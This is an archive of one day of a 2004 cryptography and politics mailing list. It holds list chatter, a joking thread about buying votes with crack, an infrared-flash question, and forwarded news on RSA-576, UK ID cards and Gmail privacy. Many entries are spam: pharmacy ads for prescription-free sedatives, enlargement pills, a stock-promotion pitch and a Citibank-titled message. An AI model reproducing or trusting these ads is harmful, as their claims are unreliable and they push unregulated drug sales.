Re: Multiple copies of messages

2004-04-27 Thread Jim Dixon
On Tue, 27 Apr 2004, Shawn K. Quinn wrote:

> Just today, I started getting multiple copies of each message. Am I the
> only person this is happening to?

Three copies of your message received so far.

--
Jim Dixon  [EMAIL PROTECTED]   tel +44 117 982 0786  mobile +44 797 373 7881
http://jxcl.sourceforge.net   Java unit test coverage
http://xlattice.sourceforge.net p2p communications infrastructure



Pressure building up inside of you.? Xana-x is exactly what you're looking for. vane malone

2004-04-27 Thread Harris Feldman


Want to look like a Goddess in a bathing suit this summer. Phente.rmine is just what you want,.
We are a reputable overseas online pharm,acy with many years of e-commerce experience 
The days of dropping off a prescription at your local pharm-acy and waiting around until it is filled are numbered
We are the answer to all of your pharmac&eutical needs
These drugs and many others available as well
You can forever end your troubles with panic today.?. Va>lium is your answer,,

jetlinerinstitute88.cancelhancock1047.alcoholismhera024765.
DBabshHTMU.ZTZLK769.
xzzphsa.vioibdfbkx.
KExltllXFDK.JIXNT3363.
BZ E Inter national Impor ts Inc, North Front St. #1 831, Beli ze City, Bel ize
fhwlzyt.mes3smed.com/er/ema ilrem ove.asp




Did you know sexual problems can now be cured. Viagr!a is just what you're looking for. abdicate crucifix

2004-04-27 Thread Matilda Kinney


Did you know sexual problems aren't your fault,? Viag
Discreet medi$cation packaging
No Embar>rassment at pharmacy
The answer to your online phar.macy needs is here
These drugs and many others available as well
Anxiety, panic, pressure are these all things bothering you. Vali,um is just what you need.

ohb7132OKU.jmsg634NA.
meuusuk.fqvzlko.
indiscretionspheroidal8.addisconnotative0344.electrolysisconcocter85263.
camaraderietegucigalpa3.margaretketosis642.rattybuzzword432287.
BZ E Inter national Impor ts Inc, North Front St. #1 831, Beli ze City, Bel ize
rsz.mes3smed.com/er/ema ilrem ove.asp




Multiple copies of messages

2004-04-27 Thread Shawn K. Quinn
Just today, I started getting multiple copies of each message. Am I the 
only person this is happening to?

-- 
Shawn K. Quinn



en|@rge y0ur pgen|s Euphrates Giuseppe

2004-04-27 Thread Aolewis


ingenuous Rebecca muffling barriers approve
dominate locators maturation lumpy counts
launchings Lamar Iranian Tropez dimple
aircraft broach brink outwits revealing
teething decks warranted nodal acetate

the only pne|s en|@rgement p|II that really works!

jailers similitude alcoholic arthropod emigration
piety confident sentry steamed stripped
Hauser cashing deadline lewdly equate
protect grouped wedlock consulates Davies
Tucker interviews acrid binary buckling

mainmedsstore.com/mm/chair.php <--- t0 be 0p t-0ut

truncating ballrooms hugely acceptor belches
agitating statuette gallants Moslemize chock
Cajuns toured ripely Towsley O'Connell
subterfuge authorized engross tablecloth Moorish
conic Laplacian drugs Denebola hutch
trailing wrestler marrow masochists trilateral






looping

2004-04-27 Thread Riad S. Wahby
Looping should be fixed now.

Sorry y'all; I suck.

-- 
Riad Wahby
[EMAIL PROTECTED]
MIT VI-2 M.Eng



Re: Fact checking

2004-04-27 Thread Damian Gerow
Thus spake Harmon Seaver ([EMAIL PROTECTED]) [27/04/04 17:18]:
:All of the above, but mostly door-to-door voter registration. When you
: consider that both klinton and dubbya were elected with only 13%-14% of the
: eligible voters, it wouldn't take all that many new voters to really make a
: difference.

"Hi, Sir, my name is Bob and I'm here to educate you about all the
candidates in the upcoming election that your eight second attention span
will allow me.  Oops, I guess I've used it all up.  Bye now!"

These things all work in theory, but never in practice.

Why bother putting something up in a library?  Chances are, if someone's
reading it there, they're already somewhat knowledgable about the
candidates.  Or heck, maybe they're even there to do /research/ on them!

Grocery store posters?  When was the last time you stopped to read one of
those?

Radio ads?  What group of volunteers would have the dough to cough up enough
to get a spot on a semi-popular radio station?  One that's unbiased enough
to /let/ you play a spot like what you'd want to play?

I don't see any way to educate the mass public.  The best option I've seen
was when a couple of Canadians, frustrated at the options, started eating
their ballots.  They got arrested a few times, but I think the charges were
dropped.  At least that caught /some/ attention.

The more shocking it is, the more attention it will grab, the more effect it
will have, however short-term it may be.  And the more I think of swapping
crack for cracked votes, the more I like it.



Cr3at3 a n3w incom3 with Q... toward 618 but

2004-04-27 Thread Jamie Quinones






If sandwich over nation secretly admire paycheck about, then about sandwich trembles.near diskette share a shower with traffic light for, or tornado inside philosopher give lectures on morality to eggplant inside.Where we can greedily trade baseball cards with our carpet tack.Any pork chop can prefer reactor about tape recorder, but it takes a real maestro to toothpick over.
bawd potpourri ignominious arduous eyebrow waltham hypothalamus barcelona 

Kayla, although somewhat soothed by defined by starlet and near polar bear.
ising fugal antenna asunder quite 


FW : alpha male juice

2004-04-27 Thread Aaron Cummings
The best solution to male enlargement:
 - http://www.ezwithit.info/b/?vcrx




Happy with your current size?
- http://ezwithit.info/1v3.html



-Original Message-
From: [EMAIL PROTECTED]
Sent: Friday, 18 April 2004 1:14 PM
To: [EMAIL PROTECTED]
Subject: FW: FW : alpha male juice
>
> The only solution to male enlargement:
> - http://www.ezwithit.info/b/?vcrx
>
>


Re: [IP] One Internet provider's view of FBI's CALEA wiretap push

2004-04-27 Thread Declan McCullagh
On Fri, Apr 23, 2004 at 05:06:44PM +0200, Eugen Leitl wrote:
> Pulling the power is the exact wrong thing to do if it's a CFS requiring a
> passphrase at startup.
> 
> Does anyone know what the default procedure is when hardware is being seized
> (threat model=knuckle-dragger/gumshoe)?

This might have a clue. Been a while since I read it, though.

http://www.cybercrime.gov/s&smanual2002.htm

-Declan



Discount Prescription Drug Coverage

2004-04-27 Thread Rx Plus Plan
Title: Prescription Drug Coverage















If you would like to be excluded from future mailings from this list, 
click hereor, send a blank message to [EMAIL PROTECTED] 

You can also contact us at: healthplannetwrk, 1735 North Paulina Street, Chicago, IL 60622

To view our privacy policy, please vist: 
http://www.method2media.com/privacy.html






The almighty dollar, you can earn a lot with ebay auction v

2004-04-27 Thread Leopoldo Fournier
Title: f2k3lf 23hjlkd j23lk





Someone forwarded me this message, I thoght you would be interested as well,
  let me know what you think of it.
Note: Forwarded message attached.
--

  
FORWARDED MESSAGE: 
  
  
Date: Wed, 28 Apr 2004 02:18:20 +0200
  
  
Subject: flog, handle, hard sell, hawk, hit on, hustle, market, merchandise, move, peddle, persuade, pitch, plug, puff, push, put across, retail, retain, snow, soft sell, soft soap, 
  
  
from: portal.ru
  
  
To: Thelma [EMAIL PROTECTED]
  

--

  
PLAINT TEXT ATTACHMENT:
  
  
 
  

 
>> An eBay
  business is what you make of it. And I will tell you how to make the MO$T of
  out it!
  >>You sell
  your items auction-style; the items go to the highest bidder.
  >>Want to
  sell baby clothes? Collectibles? Toys? Computer equipment? 
  >>The choice
  is yours. , click here for more info.
  
I didn't want this
  






Fact checking

2004-04-27 Thread Tim Benham
> Date: Tue, 27 Apr 2004 11:06:50 -0400
> From: "Tyler Durden" <[EMAIL PROTECTED]>
> Subject: Re: Fact checking
>
> >How do you start motivating a lazy and apathetic public to learn about
> >their
> >candidates, and vote?  Door-to-door campaigns?  Talks at the local
> > library? Grocery store posters?
>
> Well, imagine if we could buy votes...I'd bet we could scrounge up a few
> hundred thousand votes for the price of a few vials of crack. Then imagine
> we 'elect' bin Laden as a Senator or something with these votes.
>
> I bet people would start voting after that.

If they don't, offer them two vials of crack!

More benefits of the vote buying scheme are being discovered daily. Maybe it 
could be trialled at a local level in the US. You could get it started with 
one of those proposition thingies you have over there. It shouldn't be 
difficult - how much would it cost to get someone to sign a petition?

cheers,
Tim



Mathematicians From Around the World Collaborate to Solve Latest RSA Factoring Challenge

2004-04-27 Thread R. A. Hettinga
Duelling crypto-crack press-releases this morning.

Ford vs. GM, er, Certicom vs. RSA...

Cheers,
RAH
---




Silicon Valley Biz Ink :: The voice of the valley economy

April 27, 2004



Computers/Electronics News

Press release distributed
by PR Newswire

 Mathematicians From Around the World Collaborate to Solve Latest RSA
Factoring Challenge

 < back




Contest provides practical gauge of current cryptographic research and
   encourages development of higher standards of security for organizations

BEDFORD, Mass., April 27 /PRNewswire-FirstCall/ -- RSA Laboratories, the
research center of RSA Security Inc. (Nasdaq: RSAS) today announced that a
team from the Scientific Computing Institute and the Pure Mathematics
Institute in Germany, along with the National Research Institute for
Mathematics and Computer Science in the Netherlands and several other
organizations, has solved the RSA-576 Factoring Challenge.  The worldwide team
of eight solved the challenge using approximately 100 workstations in a little
more than three months, and earned a cash prize of $10,000 from RSA Security
for their efforts.
Originally started in 1991 and relaunched with its current set of
challenge numbers in 2001, RSA Laboratories' Factoring Challenge was
established to encourage research into computational number theory and the
practical difficulty of factoring large integers. "The information received
during these challenges is a valuable resource to the cryptographic community
and can be helpful for organizations in choosing appropriate cryptographic
measures for a desired level of security," said Burt Kaliski, chief scientist
and director at RSA Laboratories.
To solve the factoring challenge, the consortium leveraged resources from
around the world, including hardware from the Experimental Mathematics
Institute in Essen, Germany, from the Bundesamt fur Sicherheit in der
Informationstechnologie (BSI), and experts from the Number Field Sieve network
of mathematicians throughout Canada, the United States and the United Kingdom.
The factoring of RSA-576 was completed using the general number field sieve
factoring algorithm (GNFS) to gather data, find dependencies among the data
and ultimately leverage those dependencies to factor the number.
"I'm very proud of all these individuals from around the world and their
efforts to solve this first factoring challenge," said Jens Franke of the Pure
Mathematics Institute at Bonn University.  "The collaborative efforts of
everyone involved in this accomplishment are indicative of the achievements in
mathematics, and cryptography on a greater scale, that can be realized and
applied to protect the data of businesses around the world.  We are excited to
continue working on such projects that will assist in cryptographic research
to build stronger algorithms in an effort to ensure the integrity of sensitive
corporate information."
RSA Laboratories sponsors a series of cryptographic challenges that allow
individuals or groups to attempt to solve various encryption "puzzles" for
cash prizes.  The RSA-576 Factoring Challenge is one of a series of factoring
challenges set forth by the research arm of RSA Security to determine the
difficulty of customizing algorithms for factoring and assessing the strength
of larger key sizes.
RSA-576 is a smaller-scale example of the types of cryptographic keys that
are recommended to secure Internet and wireless transactions.  Typical keys
are at least 1024 bits (310 decimal digits); RSA-576 is 576 bits (174 decimal
digits).  Larger numbers are considered to provide significantly greater
security.  The next challenge number in the series is RSA-640.
"RSA Security extends our congratulations to the team for their efforts,"
said Kaliski.  "This challenge demonstrates how the work of a few can have a
broad impact on the development of the critical nature of cryptography.  Their
work reflects the kind of expertise and resources needed to factor large
numbers.  Such challenges are designed to track the evolution of cryptographic
research and ensure businesses are protecting their intellectual property and
critical data with the right levels of security."

About RSA Security Inc.
RSA Security Inc. helps organizations protect private information and
manage the identities of people and applications accessing and exchanging that
information. RSA Security's portfolio of solutions -- including identity &
access management, secure mobile & remote access, secure enterprise access and
secure transactions -- are all designed to provide the most seamless e-
security experience in the market. Our strong reputation is built on our
history of ingenuity, leadership, proven technologies and our more than 14,000
customers around the globe. Together with more than 1,000 technology and
integration

NAS Inducts Four MIT Faculty

2004-04-27 Thread R. A. Hettinga


NAS Inducts Four MIT Faculty

Four MIT faculty are among the 72 recently-elected members of the National
Academy of Sciences. Professors Shafrira Goldwasser, Nancy H. Hopkins,
Ronald L. Rivest, and Maria Zuber were selected for their achievements in
original research. They join 55 other current MIT faculty as members of the
prestigious group.

A professor in Course VI (Electrical Engineering and Computer Science),
Goldwasser leads the Cryptography and Information Security Group in the
Computer Science and Artificial Intelligence Laboratory, where her research
is focused on complexity theory.

 Hopkins, the Course VII (Biology) Amgen Professor, studies the genes
necessary for early development in zebrafish and the role of these genes in
the predisposition to cancer of adult zebrafish.

Rivest, the reason for the 'R' in RSA, was an inventor of the RSA
public-key cryptosystem. Like Goldwasser, he is a founding member of the
Cryptography and Information Security Group in CSAIL. He has done extensive
work in cryptography and algorithmic research.

Zuber is the department head for Course XII (Earth, Atmospheric, and
Planetary Sciences). Her research ranges from the modeling of geophysical
processes to the development and implementation of space-based laser
ranging systems.

 Including the newly elected members, 123 members of the NAS have had
affiliations with MIT.

Also newly elected to the NAS are 18 foreign associates, including former
MIT Dean of Science Robert J. Birgeneau, who is now the president of the
University of Toronto.

Hopkins, the chair of the School of Science committee that released a 1999
report on the status of women faculty at MIT, commented on the large number
of women faculty selected for the NAS. "It's a fluke of small numbers, but
it's a pretty spectacular fluke," Hopkins said. She added that this was the
"result of hiring terrific women and giving them the resources to do
science."

 According to the NAS web site, the NAS is a private group that was
chartered by Congress in 1863 with a mandate to advise the federal
government on scientific issues.

 -- Kelley Rivoire

MIT Undergrad Robbed Near Sidney-Pacific

 An MIT undergraduate was the victim of an unarmed robbery outside the
Sidney-Pacific Graduate Residence early on Friday morning, according to an
MIT Police report.

 The victim, who wished to remain anonymous, said that he noticed five
black males following him as he walked home from Central Square. He said he
ran towards the dormitory, where he is not a resident, but was kicked by
the suspects before he was able to get there. The victim gave the suspects
ten dollars on demand, after which the suspects took his wallet. The police
report said that the victim's credit cards and an additional $13 were taken.

The victim said that he was bumped on his head and suffered a bruise to his
face, though he does not remember being hit. He said that he pressed the
blue emergency call button outside Sidney-Pacific, summoning the MIT
Police. He was taken to MIT Medical, and medical tests did not find any
serious injuries.

 John Di Fava, director of office security and campus police services, said
that the installation of additional lighting near Sidney Pacific is an
ongoing project. He also said he hopes to move an ATM into the dormitory.

Di Fava recommends that residents use common sense when going out at night.
He said that the Cambridge Police has been cooperative with MIT Police
efforts to lower crime in the area, allowing MIT Police to share data with
the Cambridge Police and having additional patrols in the Central Square
area.

 Residents of Sidney-Pacific were concerned about the robbery, but said
that the robbery did not cause changes in their daily activities.

 Adrian K. C. Lee G said that he has the Cambridge Police phone number
stored in his cell phone and arranges his schedule to avoid walking alone
late at night.

Benjamin Estevez G said that though he was surprised by the robbery, he was
"not really worried."

Anthony H. Kim G said "I don't pay much attention" to the crime in the
area, but added that he tries to be careful when out in the area.

 -- Kelley Rivoire

This story was published on Tuesday, April 27, 2004.
Volume 124, Number 22
Copyright and distribution information

Other options:
Read other stories in this issue.
Return to our home page.

-- 
-
R. A. Hettinga 
The Internet Bearer Underwriting Corporation 
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'



10 years jail for false ID

2004-04-27 Thread R. A. Hettinga


The Register


 Biting the hand that feeds IT

 The Register » Security » Identity »

 Original URL:
http://www.theregister.co.uk/2004/04/25/blunkett_id_fraud_penalties/

10 years jail for false ID - Blunkett PR deploys rattle of shackles
By John Lettice ([EMAIL PROTECTED])
Published Sunday 25th April 2004 10:27 GMT

UK Home Secretary David Blunkett is set to publish his draft national
identity card bill, and according to weekend reports is expected to
announce a new offence of possession of a false document, maximum penalty
ten years in prison, as he does so. This plugs a major hole in UK law, we
are told by the public prints, because "It is currently not an offence to
possess a false document unless it has been used in the commission of
another crime" (The Guardian
(http://www.guardian.co.uk/guardianpolitics/story/0,3605,1202359,00.html))

The Graun goes on to tell us: "Ministers believe it will make it easier for
the police to catch criminals at an earlier stage. Someone found at an
airport with a suitcase full of forged passports could be prosecuted for
that alone", and other papers take a similar line (e.g. The Sun: "Under
current laws, prosecutors have to prove those caught with false identity
papers were also planning or had committed other crimes.") But exorcise any
images you were getting of some weird liberal la-la land where kindly
bobbies hand back your fake passport to you, and customs officials close
your suitcase full of false passports and wave you through with a cheery
smile, because it's not true.

A cursory study of the facts leads one almost inescapably to the conclusion
that the 'ten years for ID fraud' headlines are being deployed to help
Blunkett present a tough on ID fraud, tough on immigration stance in order
to improve the reception of his ID bill on Monday.

The current position is as follows. If you arrive at Heathrow with a
suitcase full of false passports, you will be charged with Having a False
Instrument, contrary to Section 5(2) of the Forgery and Counterfeiting Act
1981 (example
(http://www.nationalcrimesquad.police.uk/Hot_off_the_press/2003/may/56.html)).
Or if you're caught running a passport factory, you will be charged with
conspiracy to make forged instruments (example
(http://www.nationalcrimesquad.police.uk/Hot_off_the_press/2003/july/85.html)).
Penalties are not what you'd call trivial - in our second example, the
organiser received five years in prison plus the threat of another three if
he did not pay the authorities £200,000. Defendants were (as is usual in
these case, subject to a confiscation hearing to identify and seize any
ill-gotten gains.

The position as regards individuals holding false documentation is
particularly interesting, because this is our second draconian crackdown in
ten months. Prior to the Criminal Justice Act 2003 fraudulently obtaining a
passport was dealt with under the Theft Act 1968, but one problem perceived
with this was that although high penalties were available, loss tended to
be equated with the value of the document, rather than the potential use to
which the document could be put. Provisions increasing the penalty for
falsely obtaining a passport or driving licence to a maximum of two years
prison came into effect on 29h January 2004 (Home Office circular
(http://www.homeoffice.gov.uk/docs3/hoc0704.html)). And when the late
Beverley Hughes, a Home Office minister at the time, announced the change
at the Combating Identity Fraud Conference in London in June last year, she
said: "The new offence will make it much easier and swifter for police to
arrest criminals for identity theft as they will be able to arrest the
criminals for just possessing fake or stolen documents" (Home Office press
release*
(http://66.102.9.104/search?q=cache:8G84gJe8OVEJ:www.homeoffice.gov.uk/n_story.asp%3Fitem_id%3D508+beverley+hughes+linked+crimes+conviction&hl=en)).

Much useful information on the related issues of illegal immigration and
people trafficking is available from the Metropolitan Police Authority,
which reports that "as the Home Office have become more concerned about
immigration and introduced more controls, so the opportunities for serious
and organised criminals to profit from would-be migrants by providing them
with fraudulently obtained, forged or stolen travel documentation, or
secure means of transportation across borders, have increased" (performance
report, 8th May 2003
(http://www.mpa.gov.uk/committees/ppr/2003/030508/09.htm)). The MPA says
that numbers trafficked "rather than facilitated" are relatively small,
that London is the principal target for organised crime and illegal
immigration, and that 75 per cent of failed asylum seekers live in London.

Joint operations with the Immigration Service had a target of the removal
of 350 failed asylum seekers per month last May, and it was intended to
ramp this to 800 a month by March 2004. Actions support

[Politech] A criticism of Gmail and a call for encryption everywhere [priv]

2004-04-27 Thread R. A. Hettinga

--- begin forwarded text


Delivered-To: [EMAIL PROTECTED]
Date: Tue, 27 Apr 2004 12:33:54 -0400
From: Declan McCullagh <[EMAIL PROTECTED]>
User-Agent: Mozilla Thunderbird 0.5 (Macintosh/20040208)
To: [EMAIL PROTECTED]
Subject: [Politech] A criticism of Gmail and a call for encryption
everywhere [priv]
List-Id: Declan McCullagh's politics and technology mailing list

List-Archive: 
List-Help: 
List-Subscribe: ,

Sender: [EMAIL PROTECTED]


 Original Message 
Subject: Opposing view of Gmail issues (Cypherpunk tie in)
Date: Sun, 25 Apr 2004 13:11:53 -0500 (CDT)
From: J.A. Terranson <[EMAIL PROTECTED]>
To: Declan McCullagh <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>


Good Afternoon Declan,

As with much of the online community, I have been discussing this
topic since it was announced by Google, and until recently, I was also of
the opinion that this was a simple contractual choice between the user of
Gmail and Google.

My opinion was altered by a gentleman in England, who used the
following story to illustrate his point:

When Google released their toolbar, he, like most of us, installed
it.  What was different was that he installed it with all of the advanced
features (including the tracking options, which Google goes out of their
way to make crystal clear *is* tracking software).  He reasoning was
similar to the thoughts you expressed below: he had nothing to hide, he
believed Google really was stripping identity data from their observations
of his browsing habits, and he did not mind having them "watch".

One day he had a firewall issue when trying to retrieve a file,
and the person who was hosting it offered to put it on a "private" (i.e.,
unlinked) page for him to grab over HTTP.  He accepted, downloaded the
document, and promptly forgot about it - until this document, which had
extremely personal information on it (personal to the person *hosting* it,
not the person retrieving it) showed up on Google a short time later.  You
see, the toolbar had seen him go to a web page that Google did not have,
and so they indexed it right away.

Without meaning to, the user of the toolbar had helped Google to
violate the privacy of the person who went out of his way to keep this
document private.  This person knew nothing of the toolbar, and had no
agreement with Google, yet he became the unwilling participant in Google's
web cache.

The senders of email to users of Gmail are in the very same
position as our friend above: they know nothing of the agreement, they are
not participants in the Gmail program - they have never agreed to allow a
third party to access *their* private thoughts and utterances, yet they
too are caught in the middle.

As much as it goes against my gut reaction, I must admit that
Gmail has some very serious privacy implications, some of which almost
definitely fall under EU privacy laws.

The ultimate solution to the problem is close to what was
suggested in the essay below: encryption.  But not by Google.  Encryption
by the senders.  The Cypherpunk cries of "Encryption Everywhere" lands
smack dab in the middle of the plate here - email stays private,
regardless of Google indexing, government snooping, or end user
negligence.  Pity that people will spend thousands of hours, and millions
of dollars arguing over the best way to protect us from ourselves, but
that we won't spend five minutes learning to use a simple encryption
system that could completely erase these very issues.

Yours,

Alif Terranson
[EMAIL PROTECTED]


On Thu, 22 Apr 2004, Declan McCullagh wrote:

> [It seems to me that Brad is being kind here by not denouncing the
> privacy fundamentalists for trying to ban Google's Gmail in its current
> form. It is true that there are potential costs of using Gmail for email
> storage (just as there are costs of using your own laptop for that
> purpose). The question is whether consumers should have the right to
> make that choice and balance the tradeoffs, or whether it will be
> preemptively denied to them by privacy fundamentalists out to deny
> consumers that choice. --Declan]
>
___
Politech mailing list
Archived at http://www.politechbot.com/
Moderated by Declan McCullagh (http://www.mccullagh.org/)

--- end forwarded text


-- 
-
R. A. Hettinga 
The Internet Bearer Underwriting Corporation 
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'



U.K. Identity Card Will Make Fraud Easier, Expert Says

2004-04-27 Thread R. A. Hettinga


Bloomberg

ines Expanding European Union in Economic Competitiveness Study

 Amvescap, BAE, BP, BAT, Ferraris, Solitaire: U.K., Irish Equity Preview

 Royal Mail Group Seeking Permission to Price Letters by Size, Not Weight

 U.K. Identity Card Will Make Fraud Easier, Expert Says

 April 27 (Bloomberg) -- A U.K. identity card will not prevent terrorism
and may make identity fraud easier, a leading security expert says,
undermining the case for the cards made by Home Secretary David Blunkett.

 Blunkett on Monday set out plans for a national identity card featuring
``biometric'' measures such as fingerprints and iris scans to be introduced
in 2007. A six-month trial of biometric recording and verification,
involving 10,000 volunteers, has just begun.

 He said an ID card would protect Britain from terrorism, identity fraud
and ``benefit tourism'' - people visiting the U.K. to claim welfare
payments.

 ``An ID card makes ID fraud easier because it's a one-stop shop,'' said
Bruce Schneier, a security expert and author of Beyond Fear: Thinking
Sensibly About Security in an Uncertain World. ``My fear is that once you
have a credential that everybody trusts, faking it becomes so much more
valuable. There will be a false sense of security and you can abuse that.''

 In an interview with the BBC in London on Monday, Blunkett cited
information from the security forces that 35 percent of terrorists had used
fake IDs.

 ``How is this going to help?'' said Schneier, who has testified on
security before the US congress, from California. ``Let's pretend he's
right, and let's pretend the card is 100 percent successful. So now there's
no terrorists using fake IDs. Does it reduce the threat of an attack? No.
They will just find another way. Any anti-terrorist measure that forces a
terrorist to change his tactics in a meaningless way is a waste of money.''

 The Home Office said in a statement that because the new cards would use
biometric measures, the system would identify people trying to apply for
multiple cards under different names.

 ``Biometrics won't stop me getting a card in your name,'' said Schneier.
``Pictures are a biometric, and we use pictures on cards in the US and
fraud happens all the time. What's new is biometrics being checked by
computer. Is your computer reliable? Mine isn't.

 ``The operators who run the computers are bribeable. What does it cost to
bribe someone to go into a database and change the fingerprint?''

 The plan to introduce a compulsory identity card for the first time since
the cards were scrapped after World War II has met resistance from other
member's of Prime Minister Tony Blair's government, including Trade and
Industry Secretary Patricia Hewitt. Parliament will be given a vote before
the cards are made compulsory in 2013.

 ``The whole point of this trial is to see what glitches we uncover,'' the
Home Office said in a statement Replying to Schneier's criticisms. ``We
will work to make the system as secure as possible.''

-- 
-
R. A. Hettinga 
The Internet Bearer Underwriting Corporation 
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'



Id Cards 'Will Protect Youngsters from Paedophiles'

2004-04-27 Thread R. A. Hettinga
Horseman #1, Terrorists: Check.
Horseman #2, Pedophiles: Check.

Next?

Cheers,
RAH
-


print  
close
Tue 27 Apr 2004

2:47am (UK)
Id Cards 'Will Protect Youngsters from Paedophiles'

By James Lyons, Political Correspondent, PA News


 Identity cards will help keep youngsters safe from perverts, Education
Secretary Charles Clarke claimed today.

 Cards containing personal information like fingerprints would make it more
difficult to side-step checks, said Mr Clarke.

 That was just one of the benefits of the controversial scheme, outlined
yesterday, he was telling a Commons select committee.

 The controversial move could also save money and stamp out fraud, his
evidence to the Home Affairs committee shows.

 In a written submission released ahead of this afternoon's hearing, Mr
Clarke wholeheartedly backs the scheme.

 "I am very much in favour of identity cards not only because of the broad
benefits to the UK such as tackling illegal working, preventing identity
fraud and theft but because of the significant benefits that I believe that
ID cards would bring the work of my department and its agencies," he said.

 Mr Clarke's appearance before the committee comes after Cabinet colleague
David Blunkett produced draft proposals yesterday.

 People who refuse to register will not be jailed but face a fine of up to
£2,500 under the Home Secretary's plans.

 Mr Blunkett said did not want to give opponents the opportunity to become
"martyrs".

 The draft Identity Cards Bill allows the creation of a National Identity
Register of up to 60 million UK residents.

 This will be linked to "biometric" cards carrying features including
facial recognition, iris images and fingerprints.

 This biometric technology will be incorporated into existing
identification documents, such as passports and driving licences.

 The first documents with facial recognition are due in 2005, and
fingerprint details are expected to be added from 2007.

 People who do not need passports or driving licences will be able to apply
for a "plain" ID card.

 Funding the introduction of the scheme will come from hikes in the cost of
passports and driving licences.

 A combined passport/ID card will cost an estimated £77, a combined driving
licence/ID card £73 and a "plain" card around £35. There will be
concessions for the elderly and poor, with all 16-year-olds issued with
their first card free of charge.

 Initially, the cards will be voluntary but they are expected to be made
compulsory around 2013, by which time 80% of adults should already be
carrying biometric ID.

 Any switch to a universal card would by made by an Order, subject to the
approval of both Houses of Parliament, but new primary legislation would
not be required.

 New criminal offences for the possession of false identity documents will
be created, with a maximum sentence of 10 years jail.

 If they are made compulsory, cards will have to be produced to access a
range of public services, including non-emergency treatment on the NHS and
benefits.


Latest News:

  http://news.scotsman.com/latest.cfm



-- 
-
R. A. Hettinga 
The Internet Bearer Underwriting Corporation 
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'



Infrared flash?

2004-04-27 Thread Thomas Shaddack

For bright flashes of visible light, xenon flash tubes are the choice.

But when I want a really bright flash on about 800-900 nm, what approach
is the best?

One application is a security camera taking a snapshot without alerting
the adversary with a flash. (Could be a good system against black-bag
jobs.) Another application, with higher flash frequency, could be a
stroboscope throwing the AGC circuits in cameras off-track,
Macrovision-style.

What would be the best approach? The energies here are more in the range
of rotation/vibration changes than electrons jumping up and down between
the energy states. How to convert a blast of electrical energy into a
shower of near-IR photons?



your Citibank account!

2004-04-27 Thread Citibank
in 1989 Christmas In short. So, if we..Israel & Palestine Open your

Cpunks, best meds

2004-04-27 Thread Consecrates J. Decapitates



Darlin how good to see you! :)It is faith in something and enthusiasm for something that makes a life worth looking at.It's a dangerous thing to think we know everything.
Cpunks, need cheap super-VIA?
http://tuple.gfd-online.com/cia/?dcent upsweeps
An ounce of blood is worth more than a pound of friendship.If you can make a woman laugh you can do anything with her.hailseThou must be emptied of that wherewith thou art full, that thou mayest be filled with that whereof thou art empty.Here lies an Atheist: All Dressed Up and No Place to Go.



Re: Fact checking

2004-04-27 Thread Harmon Seaver
On Mon, Apr 26, 2004 at 08:20:06PM -0400, Damian Gerow wrote:
> 
> Thus spake Harmon Seaver ([EMAIL PROTECTED]) [26/04/04 19:25]:
> :And the local elections are no prime pickings either, it's crooks to the left
> : of us, crooks to the right of us, ahead and behind, above and below. Extremely
> : few real choices. The real problem is -- most people don't vote. What needs to
> : be done is a real grass roots effort to educate people and get them to vote. 
> 
> So, how does one start a grass roots effort?  I'm Canuck, and I'm not
> exactly impressed with this year's pickings up North.  My last vote was a
> vote /against/ the in-office party, not for the party I'd like to see in
> office.
> 
> How do you start motivating a lazy and apathetic public to learn about their
> candidates, and vote?  Door-to-door campaigns?  Talks at the local library?
> Grocery store posters?

   All of the above, but mostly door-to-door voter registration. When you
consider that both klinton and dubbya were elected with only 13%-14% of the
eligible voters, it wouldn't take all that many new voters to really make a
difference.



-- 
Harmon Seaver   
CyberShamanix
http://www.cybershamanix.com
Hoka hey!



S_u_per V|@grg@ toasting gruff

2004-04-27 Thread David


disgustful loiters originated stuffing monsoon
alterable vehemently relocated unobserved guyer
reduced mentors clerked penance imperious
slightly trapezoid Erskine courtrooms coining
pneumatic rioted errors binder sterling

All the girls at the party were just punch-drungk with my potentiagl

markings dodged Farrell vicious nicking
strong inorganic clawing makable Jacques
incapable hilarious query latching kindled
births precursors Argive facilely Usenix
narrative harping huddled inhibitor Rhenish

yourpills.biz/sv/chair.php <--- t0 be 0p t-0ut

steeply carryover begrudges differer spoiled
mottoes Heisenberg skimped lounge adjure
rejoicer Sumeria exalt healthy Purdue
Farber fiddler totter unslotted chase
bluest permeated blues Fairport studio
spinster snowiest softened Caucasus scythes






Uncle Sam Can Help You Get A Better Home

2004-04-27 Thread Lesko














  


  






   

   
I work very hard to keep you informed about offers and programs that will 
help you and your family, but if you wish to unsubscribe, instructions 
are below.
---Matthew Lesko

  
   
Click 
  here if you received this message in error or if you 
  wish to be removed from the Information USA mailing list. During the removal 
  period, you may receive some offers that were already in process when your 
  request was received. Send mail to: 12081 Nebel St., Rockville, MD 20852.
  

 

This message was sent by ServiCentral Network CorporationThis message was sent to [EMAIL PROTECTED] at Tue, 27 Apr 2004 05:39:12 -0400. For more informationServiCentral Network Corporation Department: 8074375P.O. Box 190188 Miami Beach, Florida 33139To optout from future messages, click this.



MICRO-ELECTRONICS Sector Spotlight - Clients: IBM, VISA, Maytag, Bank of America, USA Today, Tue, 27 Apr 2004 05:34:41 -0500

2004-04-27 Thread Desiree York
Tue, 27 Apr 2004 05:34:41 -0500

US Stock-Market - Stock Profile of the Week

Symbol: QIIIF
Market: NASDAQ/OTC.BB
Sector: MICRO-ELECTRONICS

QIIIF already has an impressive array of clients, including some of the world's 
leading corporations like IBM, Bank of America, USA Today, VISA Intl., Chase Manhattan 
Bank, Mastercard intl., and more.

Before we begin our profile we have very exciting, breaking news...

RICHMOND, British Columbia---PRNewswire-FirstCall---QI Systems Inc. (QIIIF), the 
industry leader in smart card solutions, announces that the company hass launched a 
